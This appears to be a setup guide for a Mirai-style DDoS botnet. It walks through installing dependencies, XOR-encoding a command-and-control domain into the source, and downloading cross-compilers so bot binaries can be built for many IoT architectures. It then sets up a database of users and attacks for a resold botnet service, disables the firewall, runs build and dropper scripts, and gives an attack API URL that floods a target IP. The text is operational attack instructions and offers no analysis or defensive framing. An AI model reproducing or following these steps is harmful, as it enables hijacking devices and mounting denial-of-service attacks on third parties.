 1 ) ########### UPDATE AND INSTALL REQUIRE ########################

yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mariadb-server gcc glibc-static -y


 2 ) ############ INSTALL GOLANG ########################"

https://go.dev/dl/

go mod init lymak
go get -u github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords
go get github.com/alexeyco/simpletable
go get github.com/bogdanovich/dns_resolver
go get github.com/gorilla/mux
go get github.com/mattn/go-sqlite3
go get github.com/naoina/toml

 3 ) ############ CHANGE FILLE ##############

dlr/main.c
loader/src/main.c
loader/src/headers/config.h

// added domain
drag file xor.c to ur vps and type command
gcc xor.c -o xor
./xor string botnet.yourdomain.com
and add TABLE_CNC_DOMAIN in table.c file
"botnet.yourdomain.com" is your domain, and it is connected to the IP to host the botnet

add_entry(TABLE_CNC_DOMAIN, "\xa2\xaf\xa2\xef\xb3\xa0\xbb\xaf\xa4\xb5\xf3\xf1\xf3\xf0\xef\xac\xad", 17);

number 17 will correspond to xor bytes

 4 ) ############ INSTALL CROSS COMPILER #########################

mkdir /etc/xcompile
cd /etc/xcompile

wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-i586.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-m68k.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-mips.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-mipsel.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-powerpc.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-sh4.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-sparc.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv4l.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv5l.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv6l.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv7l.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-x86_64.tar.bz2

tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
tar -jxf cross-compiler-x86_64.tar.bz2
rm -rf *.tar.*
mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l
mv cross-compiler-x86_64 x86_64

 5 )########### INSTALL SQL BDD ##########################

sqlite3 data.sql

CREATE TABLE `users` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,`username` TEXT NOT NULL,`password` TEXT NOT NULL,`admin` INTEGER NOT NULL,`reseller` INTEGER NOT NULL,`newuser` INTEGER NOT NULL,`api` INTEGER NOT NULL,`maxtime` INTEGER NOT NULL,`cooldown` INTEGER NOT NULL,`conns` INTEGER NOT NULL,`max_daily` INTEGER NOT NULL,`expiry` INTEGER NOT NULL);

INSERT INTO users VALUES(1,'root','root',1,1,0,0,864000,0,3,100,1790903892);

CREATE TABLE `attacks` (`target` TEXT NOT NULL,`duration` INTEGER NOT NULL,`flags` TEXT NOT NULL,`sent` INTEGER NOT NULL,`finish` INTEGER NOT NULL,`user` TEXT NOT NULL,`devices` INTEGER NOT NULL);

.databases

# now we have data.sql, move him to assests/ folder


 6 ) ########### PUT COMMANDE ############

service firewalld stop
service iptables stop 
service httpd restart
service mariadb restart

cd ~/
chmod 777 *
bash build.sh
ulimit -n999999; ulimit -u999999; ulimit -e999999

cd ~/
chmod 777 *
bash dropper.sh
ulimit -n999999; ulimit -u999999; ulimit -e999999

screen ./admin

// FAQ

- Using api: http://ip:81/attack?user=root&password=root@123&target=1.1.1.1&duration=60&method=udpthread

- Change bot port and cnc port in assets/server.toml

- If you need help, contact @az369za
